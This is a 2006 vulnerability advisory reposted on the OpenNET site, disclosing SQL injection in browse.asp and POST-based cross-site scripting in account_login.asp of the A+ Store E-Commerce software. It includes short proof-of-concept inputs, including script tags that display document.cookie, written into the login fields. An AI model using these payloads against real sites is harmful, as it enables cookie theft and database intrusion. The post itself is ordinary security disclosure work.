The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


A+ Store E-Commerce[ injection sql & xss (post) ]


<< Previous INDEX Search src / Print Next >>
Date: 14 Nov 2006 20:45:11 -0000
From: [email protected]
To: [email protected]
Subject: A+ Store E-Commerce[ injection sql & xss (post) ]
X-Virus-Scanned: antivirus-gw at tyumen.ru

vendor site:http://www.webinhabit.com/
product:A+ Store E-Commerce
bug:injection sql & xss post
risk:medium


injection sql (get) :
http://site.com/browse.asp?ParentID='[sql]

xss post :
in /account_login.asp:
username = </textarea>'"><script>alert(document.cookie)</script></textarea>'"><script>alert(document.cookie)</script>
passwd = </textarea>'"><script>alert(document.cookie)</script></textarea>'"><script>alert(document.cookie)</script>


laurent gaffiИ & benjamin mossИ
http://s-a-p.ca/
contact: [email protected]


<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру